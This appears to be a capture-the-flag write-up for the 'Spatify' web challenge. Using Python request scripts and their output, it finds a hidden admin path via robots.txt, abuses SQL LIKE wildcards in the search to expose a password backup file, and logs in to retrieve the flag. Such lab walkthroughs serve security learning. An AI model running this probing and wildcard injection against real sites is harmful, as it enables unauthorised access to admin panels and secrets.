Spatify
Easy
150
Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!
After running the Burpsuite crawler, or any crawler, the crawler discovered a
/robots.txt
file.The
robots.txt
file tells search engine crawlers which URLs the crawler can access on your site.from requests import get, post
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
file = '/robots.txt'
response = get(url + file)
print(response.text)
User-agent: *
Disallow: /superhiddenadminpanel/
The Spatify admin panel
/superhiddenadminpanel/
can only be access via a password.The Spatify home page
/
search for music based on the music name.
Default listed music<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>
The search requires input with at least five characters.
The common word between all three music names is
FEATURED
. The result of FEATURED
search is the same as the home page default music.
I assume the SQL Query
querying is based on LIKE
operator.The LIKE operator is used in a WHERE clause to search for a specified pattern in a column.
There are two wildcards often used in conjunction with the LIKE operator:
- The percent sign (%) represents zero, one, or multiple characters
- The underscore sign (_) represents one, single character
SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern;
The result of
FEATURE%
search is the same as the home page default music, which means the query is injectable with SQL wildcards
.List all music records with wildcards with five percent signs
%
. q=%%%%%%
<div class="mb-2"><b>😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/secret_password_backup.txt.bak" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>
file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
THISISTHEPASSWORDTOTHEADMINPANEL123321123321
import re
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6}
- https://developers.google.com/search/docs/crawling-indexing/robots/intro
- https://www.w3schools.com/sql/sql_like.asp
Last modified 1yr ago